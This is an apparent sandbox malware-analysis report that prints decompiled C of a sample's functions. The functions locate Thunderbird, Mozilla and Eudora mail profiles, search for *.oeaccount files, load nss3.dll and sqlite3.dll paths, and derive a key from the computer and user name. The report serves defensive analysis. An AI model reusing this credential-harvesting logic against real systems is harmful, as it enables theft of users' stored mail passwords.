                                                                                                                                                                        • Instruction Fuzzy Hash: DAF0377620521E7BE6102565AC40E77779CEB86276B21072BBD10E65D1ED59EC0046B4
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Executed Functions

                                                                                                                                                                        Function 004073B6 Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 143stringCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 129 4073b6-4074ff memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 407501 129->130 131 407535-407538 129->131 134 407507-407510 130->134 132 407569-40756d 131->132 133 40753a-407543 131->133 135 407545-407549 133->135 136 40754a-407567 133->136 137 407512-407516 134->137 138 407517-407533 134->138 135->136 136->132 136->133 137->138 138->131 138->134
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E004073B6(signed int _a4) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				void _v20;
				long _v24;
				int _v28;
				int _v32;
				void* _v36;
				void _v291;
				char _v292;
				void _v547;
				char _v548;
				void _v1058;
				short _v1060;
				void _v1570;
				short _v1572;
				int _t88;
				signed int _t91;
				signed int _t92;
				signed int _t94;
				signed int _t96;
				signed int _t99;
				signed int _t104;
				signed short* _t110;
				void* _t113;
				void* _t114;

				_t92 = 0;
				_v20 = 0xa3;
				_v19 = 0x1e;
				_v18 = 0xf3;
				_v17 = 0x69;
				_v16 = 7;
				_v15 = 0x62;
				_v14 = 0xd9;
				_v13 = 0x1f;
				_v12 = 0x1e;
				_v11 = 0xe9;
				_v10 = 0x35;
				_v9 = 0x7d;
				_v8 = 0x4f;
				_v7 = 0xd2;
				_v6 = 0x7d;
				_v5 = 0x48;
				_v292 = 0;
				memset( &_v291, 0, 0xff);
				_v548 = 0;
				memset( &_v547, 0, 0xff);
				_v1572 = 0;
				memset( &_v1570, 0, 0x1fe);
				_v1060 = 0;
				memset( &_v1058, 0, 0x1fe);
				_v36 = _a4 + 4;
				_a4 = 0;
				_v24 = 0xff;
				GetComputerNameA( &_v292,  &_v24); // executed
				_v24 = 0xff;
				GetUserNameA( &_v548,  &_v24); // executed
				MultiByteToWideChar(0, 0,  &_v292, 0xffffffff,  &_v1572, 0xff);
				MultiByteToWideChar(0, 0,  &_v548, 0xffffffff,  &_v1060, 0xff);
				_v32 = strlen( &_v292);
				_t88 = strlen( &_v548);
				_t113 = _v36;
				_v28 = _t88;
				memcpy(_t113,  &_v20, 0x10);
				_t91 = 0xba0da71d;
				if(_v28 > 0) {
					_t110 =  &_v1060;
					do {
						_t104 = _a4 & 0x80000003;
						if(_t104 < 0) {
							_t104 = (_t104 - 0x00000001 | 0xfffffffc) + 1;
						}
						_t96 = ( *_t110 & 0x0000ffff) * _t91;
						_t91 = _t91 * 0xbc8f;
						 *(_t113 + _t104 * 4) =  *(_t113 + _t104 * 4) ^ _t96;
						_a4 = _a4 + 1;
						_t110 =  &(_t110[1]);
					} while (_a4 < _v28);
				}
				if(_v32 > _t92) {
					do {
						_t99 = _a4 & 0x80000003;
						if(_t99 < 0) {
							_t99 = (_t99 - 0x00000001 | 0xfffffffc) + 1;
						}
						_t94 = ( *(_t114 + _t92 * 2 - 0x620) & 0x0000ffff) * _t91;
						_t91 = _t91 * 0xbc8f;
						 *(_t113 + _t99 * 4) =  *(_t113 + _t99 * 4) ^ _t94;
						_a4 = _a4 + 1;
						_t92 = _t92 + 1;
					} while (_t92 < _v32);
				}
				return _t91;
			}









































                                                                                                                                                                        0x004073c7
                                                                                                                                                                        0x004073d2
                                                                                                                                                                        0x004073d6
                                                                                                                                                                        0x004073da
                                                                                                                                                                        0x004073de
                                                                                                                                                                        0x004073e2
                                                                                                                                                                        0x004073e6
                                                                                                                                                                        0x004073ea
                                                                                                                                                                        0x004073ee
                                                                                                                                                                        0x004073f2
                                                                                                                                                                        0x004073f6
                                                                                                                                                                        0x004073fa
                                                                                                                                                                        0x004073fe
                                                                                                                                                                        0x00407402
                                                                                                                                                                        0x00407406
                                                                                                                                                                        0x0040740a
                                                                                                                                                                        0x0040740e
                                                                                                                                                                        0x00407412
                                                                                                                                                                        0x00407418
                                                                                                                                                                        0x00407426
                                                                                                                                                                        0x0040742c
                                                                                                                                                                        0x0040743f
                                                                                                                                                                        0x00407446
                                                                                                                                                                        0x00407454
                                                                                                                                                                        0x0040745b
                                                                                                                                                                        0x00407466
                                                                                                                                                                        0x00407477
                                                                                                                                                                        0x0040747a
                                                                                                                                                                        0x0040747d
                                                                                                                                                                        0x0040748e
                                                                                                                                                                        0x00407491
                                                                                                                                                                        0x004074b0
                                                                                                                                                                        0x004074c5
                                                                                                                                                                        0x004074d3
                                                                                                                                                                        0x004074dd
                                                                                                                                                                        0x004074e2
                                                                                                                                                                        0x004074e5
                                                                                                                                                                        0x004074ef
                                                                                                                                                                        0x004074fa
                                                                                                                                                                        0x004074ff
                                                                                                                                                                        0x00407501
                                                                                                                                                                        0x00407507
                                                                                                                                                                        0x0040750a
                                                                                                                                                                        0x00407510
                                                                                                                                                                        0x00407516
                                                                                                                                                                        0x00407516
                                                                                                                                                                        0x0040751a
                                                                                                                                                                        0x0040751d
                                                                                                                                                                        0x00407526
                                                                                                                                                                        0x00407528
                                                                                                                                                                        0x0040752f
                                                                                                                                                                        0x00407530
                                                                                                                                                                        0x00407507
                                                                                                                                                                        0x00407538
                                                                                                                                                                        0x0040753a
                                                                                                                                                                        0x0040753d
                                                                                                                                                                        0x00407543
                                                                                                                                                                        0x00407549
                                                                                                                                                                        0x00407549
                                                                                                                                                                        0x00407552
                                                                                                                                                                        0x00407555
                                                                                                                                                                        0x0040755e
                                                                                                                                                                        0x00407560
                                                                                                                                                                        0x00407563
                                                                                                                                                                        0x00407564
                                                                                                                                                                        0x0040753a
                                                                                                                                                                        0x0040756d

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                                                                                                                        • String ID: 5$H$O$b$i$}$}
                                                                                                                                                                        • API String ID: 1832431107-3760989150
                                                                                                                                                                        • Opcode ID: aceb3002e6d76f9fd17eae514da83f7be29cbb3531b765aef18c994d04d9c626
                                                                                                                                                                        • Instruction ID: c4a028c48163d552ebb965a22663fb4caedd15d38ec5c0ca2e6f283cdba292cd
                                                                                                                                                                        • Opcode Fuzzy Hash: aceb3002e6d76f9fd17eae514da83f7be29cbb3531b765aef18c994d04d9c626
                                                                                                                                                                        • Instruction Fuzzy Hash: 7A51E771C0025DAEDB11CFA8CC40BEEBBBCEF49314F0442AAE555E6191D3789B85CB65
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040702D Relevance: 6.1, APIs: 4, Instructions: 58filestringCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 450 40702d-407036 451 407038-407057 FindFirstFileA 450->451 452 407059-40706d FindNextFileA 450->452 453 407074-407079 451->453 454 40707b-4070a9 strlen * 2 452->454 455 40706f call 4070c5 452->455 453->454 457 4070be-4070c4 453->457 458 4070b8 454->458 459 4070ab-4070b6 call 4062b7 454->459 455->453 461 4070bb-4070bd 458->461 459->461 461->457
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E0040702D(void** __eax) {
				void* __esi;
				void* _t15;
				int _t16;
				int _t17;
				void* _t26;
				void** _t38;
				void** _t40;
				void* _t45;

				_t40 = __eax;
				_t15 =  *__eax;
				if(_t15 != 0xffffffff) {
					_t6 =  &(_t40[0x52]); // 0x247
					_t16 = FindNextFileA(_t15, _t6); // executed
					 *(_t45 + 4) = _t16;
					if(_t16 != 0) {
						goto L5;
					} else {
						E004070C5(_t40);
						goto L4;
					}
				} else {
					_t1 =  &(_t40[0x52]); // 0x247
					_t2 =  &(_t40[1]); // 0x103
					_t26 = FindFirstFileA(_t2, _t1); // executed
					 *_t40 = _t26;
					 *(_t45 + 4) = 0 | _t26 != 0xffffffff;
					L4:
					if( *(_t45 + 4) != 0) {
						L5:
						_t9 =  &(_t40[0xa2]); // 0x387
						_t38 = _t9;
						_t10 =  &(_t40[0x5d]); // 0x273
						_t28 = _t10;
						_t41 =  &(_t40[0xf3]);
						_t17 = strlen( &(_t40[0xf3]));
						if(strlen(_t10) + _t17 + 1 >= 0x143) {
							 *_t38 = 0;
						} else {
							E004062B7(_t38, _t41, _t28);
						}
					}
				}
				return  *(_t45 + 4);
			}











                                                                                                                                                                        0x0040702f
                                                                                                                                                                        0x00407031
                                                                                                                                                                        0x00407036
                                                                                                                                                                        0x00407059
                                                                                                                                                                        0x00407061
                                                                                                                                                                        0x00407069
                                                                                                                                                                        0x0040706d
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040706f
                                                                                                                                                                        0x0040706f
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040706f
                                                                                                                                                                        0x00407038
                                                                                                                                                                        0x00407038
                                                                                                                                                                        0x0040703f
                                                                                                                                                                        0x00407043
                                                                                                                                                                        0x00407051
                                                                                                                                                                        0x00407053
                                                                                                                                                                        0x00407074
                                                                                                                                                                        0x00407079
                                                                                                                                                                        0x0040707b
                                                                                                                                                                        0x0040707e
                                                                                                                                                                        0x0040707e
                                                                                                                                                                        0x00407084
                                                                                                                                                                        0x00407084
                                                                                                                                                                        0x0040708a
                                                                                                                                                                        0x00407091
                                                                                                                                                                        0x004070a9
                                                                                                                                                                        0x004070b8
                                                                                                                                                                        0x004070ab
                                                                                                                                                                        0x004070af
                                                                                                                                                                        0x004070b5
                                                                                                                                                                        0x004070bd
                                                                                                                                                                        0x00407079
                                                                                                                                                                        0x004070c4

                                                                                                                                                                        APIs
                                                                                                                                                                        • FindFirstFileA.KERNELBASE(00000103,00000247,?,?,0041134A,*.oeaccount,0041141B,?,00000104), ref: 00407043
                                                                                                                                                                        • FindNextFileA.KERNELBASE(000000FF,00000247,?,?,0041134A,*.oeaccount,0041141B,?,00000104), ref: 00407061
                                                                                                                                                                        • strlen.MSVCRT ref: 00407091
                                                                                                                                                                        • strlen.MSVCRT ref: 00407099
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileFindstrlen$FirstNext
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 379999529-0
                                                                                                                                                                        • Opcode ID: 23327769c2c6ed145b7f0a678d94cded64fbce7ba272a02f3800eca3ff4be886
                                                                                                                                                                        • Instruction ID: ee1fc6f362411e34e0c03f62be7ba86f9bee0943d1b98e177d8d8cef5f5d9398
                                                                                                                                                                        • Opcode Fuzzy Hash: 23327769c2c6ed145b7f0a678d94cded64fbce7ba272a02f3800eca3ff4be886
                                                                                                                                                                        • Instruction Fuzzy Hash: 1E1182728092059FD3149B34D844ADBB7DC9F04325F204A3FF05AD31D0EB38B945876A
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00401E4A Relevance: 52.8, APIs: 19, Strings: 11, Instructions: 261stringregistryCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        C-Code - Quality: 97%
                                                                                                                                                                        			E00401E4A(void* __eflags, char* _a4) {
				signed int _v8;
				int _v12;
				void _v275;
				char _v276;
				void _v539;
				char _v540;
				void _v795;
				char _v796;
				void _v1059;
				char _v1060;
				void _v1323;
				char _v1324;
				void _v2347;
				char _v2348;
				void* __edi;
				void* __esi;
				int _t65;
				char* _t69;
				char _t70;
				int _t71;
				char _t75;
				void* _t76;
				long _t78;
				void* _t83;
				int _t85;
				void* _t87;
				int _t104;
				int _t108;
				char _t126;
				void* _t137;
				void* _t139;
				char* _t157;
				char* _t158;
				char* _t160;
				int _t161;
				void* _t164;
				CHAR* _t169;
				char* _t170;
				void* _t171;
				void* _t172;
				void* _t173;
				void* _t174;
				void* _t175;

				_v540 = 0;
				memset( &_v539, 0, 0x104);
				_t164 = 0x1a;
				E0040F4CA( &_v540, _t164); // executed
				_t65 = strlen("Mozilla\\Profiles");
				_t6 = strlen( &_v540) + 1; // 0x1
				_t172 = _t171 + 0x14;
				if(_t65 + _t6 >= 0x104) {
					_t69 = _a4;
					 *_t69 = 0;
					_t157 = _t69;
				} else {
					_t157 = _a4;
					E004062B7(_t157,  &_v540, "Mozilla\\Profiles");
				}
				_t70 = E00406155(_t157);
				if(_t70 == 0) {
					 *_t157 = _t70;
				}
				_t158 = _t157 + 0x105;
				_t71 = strlen("Thunderbird\\Profiles");
				_t12 = strlen( &_v540) + 1; // 0x1
				if(_t71 + _t12 >= 0x104) {
					 *_t158 = 0;
				} else {
					E004062B7(_t158,  &_v540, "Thunderbird\\Profiles");
				}
				_t75 = E00406155(_t158);
				_pop(_t137);
				if(_t75 == 0) {
					 *_t158 = _t75;
				}
				_t160 = _a4 + 0x20a;
				_t76 = E00401C56(_t137, _t160, 0x80000001, "Software\\Qualcomm\\Eudora\\CommandLine", "current"); // executed
				_t173 = _t172 + 0xc;
				if(_t76 == 0) {
					_t126 = E00401C56(_t137, _t160, 0x80000002, "Software\\Classes\\Software\\Qualcomm\\Eudora\\CommandLine\\current", 0x41344f); // executed
					_t173 = _t173 + 0xc;
					if(_t126 == 0) {
						 *_t160 = _t126;
					}
				}
				_v8 = _v8 & 0x00000000;
				_t78 = E0040F1B0(0x80000002, "Software\\Mozilla\\Mozilla Thunderbird",  &_v8);
				_t174 = _t173 + 0xc;
				if(_t78 != 0) {
					L32:
					_t169 = _a4 + 0x30f;
					if( *_t169 != 0) {
						L35:
						return _t78;
					}
					ExpandEnvironmentStringsA("%programfiles%\\Mozilla Thunderbird", _t169, 0x104);
					_t78 = E00406155(_t169);
					if(_t78 != 0) {
						goto L35;
					}
					 *_t169 = _t78;
					return _t78;
				} else {
					_v796 = _t78;
					_t161 = 0;
					memset( &_v795, 0, 0xff);
					_v12 = 0;
					_t83 = E0040F276(_v8, 0,  &_v796);
					_t175 = _t174 + 0x18;
					if(_t83 != 0) {
						L31:
						_t78 = RegCloseKey(_v8);
						goto L32;
					}
					_t170 = "sqlite3.dll";
					do {
						_t85 = atoi( &_v796);
						_pop(_t139);
						if(_t85 < 3) {
							goto L28;
						}
						_v2348 = 0;
						memset( &_v2347, _t161, 0x3ff);
						_v276 = 0;
						memset( &_v275, _t161, 0x104);
						sprintf( &_v2348, "%s\\Main",  &_v796);
						E0040F232(_t139, _v8,  &_v2348, "Install Directory",  &_v276, 0x104);
						_t175 = _t175 + 0x38;
						if(_v276 != 0 && E00406155( &_v276) != 0) {
							_v1060 = 0;
							memset( &_v1059, _t161, 0x104);
							_v1324 = 0;
							memset( &_v1323, _t161, 0x104);
							_t104 = strlen(_t170);
							_t41 = strlen( &_v276) + 1; // 0x1
							_t175 = _t175 + 0x20;
							if(_t104 + _t41 >= 0x104) {
								_v1060 = 0;
							} else {
								E004062B7( &_v1060,  &_v276, _t170);
							}
							_t108 = strlen("nss3.dll");
							_t47 = strlen( &_v276) + 1; // 0x1
							if(_t108 + _t47 >= 0x104) {
								_v1324 = 0;
							} else {
								E004062B7( &_v1324,  &_v276, "nss3.dll");
							}
							if(E00406155( &_v1060) == 0 || E00406155( &_v1324) == 0) {
								_t161 = 0;
								goto L28;
							} else {
								strcpy(_a4 + 0x30f,  &_v276);
								goto L31;
							}
						}
						L28:
						_v12 = _v12 + 1;
						_t87 = E0040F276(_v8, _v12,  &_v796);
						_t175 = _t175 + 0xc;
					} while (_t87 == 0);
					goto L31;
				}
			}














































                                                                                                                                                                        0x00401e65
                                                                                                                                                                        0x00401e6c
                                                                                                                                                                        0x00401e73
                                                                                                                                                                        0x00401e7a
                                                                                                                                                                        0x00401e85
                                                                                                                                                                        0x00401e98
                                                                                                                                                                        0x00401e9c
                                                                                                                                                                        0x00401ea1
                                                                                                                                                                        0x00401eb9
                                                                                                                                                                        0x00401ebc
                                                                                                                                                                        0x00401ebf
                                                                                                                                                                        0x00401ea3
                                                                                                                                                                        0x00401ea3
                                                                                                                                                                        0x00401eb0
                                                                                                                                                                        0x00401eb6
                                                                                                                                                                        0x00401ec2
                                                                                                                                                                        0x00401eca
                                                                                                                                                                        0x00401ecc
                                                                                                                                                                        0x00401ecc
                                                                                                                                                                        0x00401ed3
                                                                                                                                                                        0x00401ed9
                                                                                                                                                                        0x00401eec
                                                                                                                                                                        0x00401ef4
                                                                                                                                                                        0x00401f0d
                                                                                                                                                                        0x00401ef6
                                                                                                                                                                        0x00401f04
                                                                                                                                                                        0x00401f0a
                                                                                                                                                                        0x00401f11
                                                                                                                                                                        0x00401f18
                                                                                                                                                                        0x00401f19
                                                                                                                                                                        0x00401f1b
                                                                                                                                                                        0x00401f1b
                                                                                                                                                                        0x00401f2a
                                                                                                                                                                        0x00401f35
                                                                                                                                                                        0x00401f3a
                                                                                                                                                                        0x00401f44
                                                                                                                                                                        0x00401f51
                                                                                                                                                                        0x00401f56
                                                                                                                                                                        0x00401f5b
                                                                                                                                                                        0x00401f5d
                                                                                                                                                                        0x00401f5d
                                                                                                                                                                        0x00401f5b
                                                                                                                                                                        0x00401f5f
                                                                                                                                                                        0x00401f6d
                                                                                                                                                                        0x00401f72
                                                                                                                                                                        0x00401f77
                                                                                                                                                                        0x00402168
                                                                                                                                                                        0x0040216b
                                                                                                                                                                        0x00402174
                                                                                                                                                                        0x00402194
                                                                                                                                                                        0x00402194
                                                                                                                                                                        0x00402194
                                                                                                                                                                        0x0040217d
                                                                                                                                                                        0x00402184
                                                                                                                                                                        0x0040218c
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040218e
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00401f7d
                                                                                                                                                                        0x00401f82
                                                                                                                                                                        0x00401f88
                                                                                                                                                                        0x00401f92
                                                                                                                                                                        0x00401fa2
                                                                                                                                                                        0x00401fa5
                                                                                                                                                                        0x00401faa
                                                                                                                                                                        0x00401faf
                                                                                                                                                                        0x0040215f
                                                                                                                                                                        0x00402162
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00402162
                                                                                                                                                                        0x00401fb5
                                                                                                                                                                        0x00401fba
                                                                                                                                                                        0x00401fc1
                                                                                                                                                                        0x00401fc9
                                                                                                                                                                        0x00401fca
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00401fdd
                                                                                                                                                                        0x00401fe4
                                                                                                                                                                        0x00401ff2
                                                                                                                                                                        0x00401ff9
                                                                                                                                                                        0x00402011
                                                                                                                                                                        0x0040202d
                                                                                                                                                                        0x00402032
                                                                                                                                                                        0x0040203c
                                                                                                                                                                        0x00402060
                                                                                                                                                                        0x00402067
                                                                                                                                                                        0x00402075
                                                                                                                                                                        0x0040207c
                                                                                                                                                                        0x00402082
                                                                                                                                                                        0x00402095
                                                                                                                                                                        0x00402099
                                                                                                                                                                        0x0040209e
                                                                                                                                                                        0x004020b7
                                                                                                                                                                        0x004020a0
                                                                                                                                                                        0x004020ae
                                                                                                                                                                        0x004020b4
                                                                                                                                                                        0x004020c3
                                                                                                                                                                        0x004020d6
                                                                                                                                                                        0x004020de
                                                                                                                                                                        0x004020fb
                                                                                                                                                                        0x004020e0
                                                                                                                                                                        0x004020f2
                                                                                                                                                                        0x004020f8
                                                                                                                                                                        0x00402111
                                                                                                                                                                        0x00402124
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00402148
                                                                                                                                                                        0x00402158
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040215e
                                                                                                                                                                        0x00402111
                                                                                                                                                                        0x00402126
                                                                                                                                                                        0x00402126
                                                                                                                                                                        0x00402136
                                                                                                                                                                        0x0040213b
                                                                                                                                                                        0x0040213e
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00402146

                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 00401E6C
                                                                                                                                                                        • strlen.MSVCRT ref: 00401E85
                                                                                                                                                                        • strlen.MSVCRT ref: 00401E93
                                                                                                                                                                        • strlen.MSVCRT ref: 00401ED9
                                                                                                                                                                        • strlen.MSVCRT ref: 00401EE7
                                                                                                                                                                        • memset.MSVCRT ref: 00401F92
                                                                                                                                                                        • atoi.MSVCRT ref: 00401FC1
                                                                                                                                                                        • memset.MSVCRT ref: 00401FE4
                                                                                                                                                                        • sprintf.MSVCRT ref: 00402011
                                                                                                                                                                          • Part of subcall function 0040F232: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 0040F26B
                                                                                                                                                                        • memset.MSVCRT ref: 00402067
                                                                                                                                                                        • memset.MSVCRT ref: 0040207C
                                                                                                                                                                        • strlen.MSVCRT ref: 00402082
                                                                                                                                                                        • strlen.MSVCRT ref: 00402090
                                                                                                                                                                        • strlen.MSVCRT ref: 004020C3
                                                                                                                                                                        • strlen.MSVCRT ref: 004020D1
                                                                                                                                                                        • memset.MSVCRT ref: 00401FF9
                                                                                                                                                                          • Part of subcall function 004062B7: strcpy.MSVCRT(00000000,00000000,sqlite3.dll,004020F7,00000000,nss3.dll), ref: 004062BF
                                                                                                                                                                          • Part of subcall function 004062B7: strcat.MSVCRT(00000000,00000000,00000000,00000000,sqlite3.dll,004020F7,00000000,nss3.dll), ref: 004062CE
                                                                                                                                                                        • strcpy.MSVCRT(?,00000000), ref: 00402158
                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00402162
                                                                                                                                                                        • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040217D
                                                                                                                                                                          • Part of subcall function 00406155: GetFileAttributesA.KERNELBASE(?,00408328,?,004083DE,00000000,?,00000000,00000104,?), ref: 00406159
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: strlen$memset$Closestrcpy$AttributesEnvironmentExpandFileStringsatoisprintfstrcat
                                                                                                                                                                        • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                                                                                                                                        • API String ID: 2492260235-4223776976
                                                                                                                                                                        • Opcode ID: 59627f2f584a0fc03280b870890c3a08f891bace1e47a2458c552be32f244d3b
                                                                                                                                                                        • Instruction ID: 6d070b6b648a05e91db5632b048882ca6db18ac9797f22d42d855398ddad24fb
                                                                                                                                                                        • Opcode Fuzzy Hash: 59627f2f584a0fc03280b870890c3a08f891bace1e47a2458c552be32f244d3b
                                                                                                                                                                        • Instruction Fuzzy Hash: 8B91C772804159AEDB21E6958C45FDB7BAD9F18309F1400BBF608F2182EB789BC58B5D
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040BB8D Relevance: 42.2, APIs: 19, Strings: 5, Instructions: 169COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        C-Code - Quality: 85%
                                                                                                                                                                        			E0040BB8D(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, intOrPtr _a12) {
				char* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v304;
				signed int _v308;
				struct HWND__* _v312;
				intOrPtr _v608;
				struct HACCEL__* _v620;
				struct HWND__* _v644;
				char _v900;
				char _v904;
				char _v908;
				struct tagMSG _v936;
				intOrPtr _v940;
				struct HWND__* _v944;
				struct HWND__* _v948;
				char _v956;
				char _v980;
				char _v988;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t49;
				void* _t52;
				int _t56;
				int _t58;
				int _t69;
				void* _t73;
				int _t76;
				int _t78;
				struct HWND__* _t79;
				int _t81;
				int _t86;
				int _t87;
				struct HWND__* _t101;

				_t96 = __ecx;
				 *0x417b94 = _a4;
				_t49 = E00404841(__ecx);
				if(_t49 != 0) {
					E0040F41D();
					_t52 = E00406A5B( &_v980);
					_t101 = 0;
					_v940 = 0x20;
					_v948 = 0;
					_v936.hwnd = 0;
					_v944 = 0;
					_v936.message = 0;
					E0040B91E(_t52,  &_v900); // executed
					_v8 =  &_v980;
					E00406DF1(__eflags,  &_v980, _a12);
					_t56 = E00406F65(_v16, "/savelangfile");
					__eflags = _t56;
					if(_t56 < 0) {
						E004083A7(); // executed
						_t58 = E00406F65(_v8, "/deleteregkey");
						__eflags = _t58;
						if(_t58 < 0) {
							 *0x418110 = 0x11223344; // executed
							EnumResourceTypesA( *0x417b94, E0040F402, 0); // executed
							__eflags =  *0x418110 - 0x4695399a;
							if( *0x418110 == 0x4695399a) {
								__eflags =  *((intOrPtr*)(_v12 + 0x30)) - 1;
								if(__eflags <= 0) {
									L13:
									__imp__CoInitialize(_t101);
									E0040B84C(_t96,  &_v908);
									__eflags = _v608 - 3;
									if(_v608 != 3) {
										_push(5);
									} else {
										_push(3);
									}
									ShowWindow(_v644, ??);
									UpdateWindow(_v644);
									_v620 = LoadAcceleratorsA( *0x417b94, 0x67);
									E0040AEB7( &_v908);
									_t69 = GetMessageA( &_v936, _t101, _t101, _t101);
									__eflags = _t69;
									if(_t69 == 0) {
										L24:
										__imp__CoUninitialize();
										goto L25;
									} else {
										do {
											_t76 = TranslateAcceleratorA(_v644, _v620,  &_v936);
											__eflags = _t76;
											if(_t76 != 0) {
												goto L23;
											}
											_t79 =  *0x4181ac;
											__eflags = _t79 - _t101;
											if(_t79 == _t101) {
												L21:
												_t81 = IsDialogMessageA(_v644,  &_v936);
												__eflags = _t81;
												if(_t81 == 0) {
													TranslateMessage( &_v936);
													DispatchMessageA( &_v936);
												}
												goto L23;
											}
											_t86 = IsDialogMessageA(_t79,  &_v936);
											__eflags = _t86;
											if(_t86 != 0) {
												goto L23;
											}
											goto L21;
											L23:
											_t78 = GetMessageA( &_v936, _t101, _t101, _t101);
											__eflags = _t78;
										} while (_t78 != 0);
										goto L24;
									}
								}
								_t87 = E0040BAB7( &_v904, __eflags);
								__eflags = _t87;
								if(_t87 == 0) {
									_t101 = 0;
									__eflags = 0;
									goto L13;
								}
								_push(_v28);
								_v904 = 0x41457c;
								L00412096();
								__eflags = _v304;
								if(_v304 != 0) {
									DeleteObject(_v304);
									_v308 = _v308 & 0x00000000;
								}
								goto L27;
							}
							MessageBoxA(0, "Failed to load the executable file !", "Error", 0x30);
							goto L25;
						}
						RegDeleteKeyA(0x80000001, 0x41344f);
						goto L25;
					} else {
						 *0x418488 = 0x417b28;
						E004084D8();
						L25:
						_push(_v32);
						_v908 = 0x41457c;
						L00412096();
						__eflags = _v308 - _t101;
						if(_v308 != _t101) {
							DeleteObject(_v308);
							_v312 = _t101;
						}
						L27:
						_v908 = 0x41346c;
						E00406A7D( &_v988);
						E00404638( &_v956);
						E00406A7D( &_v988);
						_t73 = 0;
						__eflags = 0;
						goto L28;
					}
				} else {
					_t73 = _t49 + 1;
					L28:
					return _t73;
				}
			}








































                                                                                                                                                                        0x0040bb8d
                                                                                                                                                                        0x0040bb9f
                                                                                                                                                                        0x0040bba4
                                                                                                                                                                        0x0040bbab
                                                                                                                                                                        0x0040bbb3
                                                                                                                                                                        0x0040bbbc
                                                                                                                                                                        0x0040bbc1
                                                                                                                                                                        0x0040bbc7
                                                                                                                                                                        0x0040bbcf
                                                                                                                                                                        0x0040bbd3
                                                                                                                                                                        0x0040bbd7
                                                                                                                                                                        0x0040bbdb
                                                                                                                                                                        0x0040bbdf
                                                                                                                                                                        0x0040bbec
                                                                                                                                                                        0x0040bbf3
                                                                                                                                                                        0x0040bc04
                                                                                                                                                                        0x0040bc09
                                                                                                                                                                        0x0040bc0b
                                                                                                                                                                        0x0040bc21
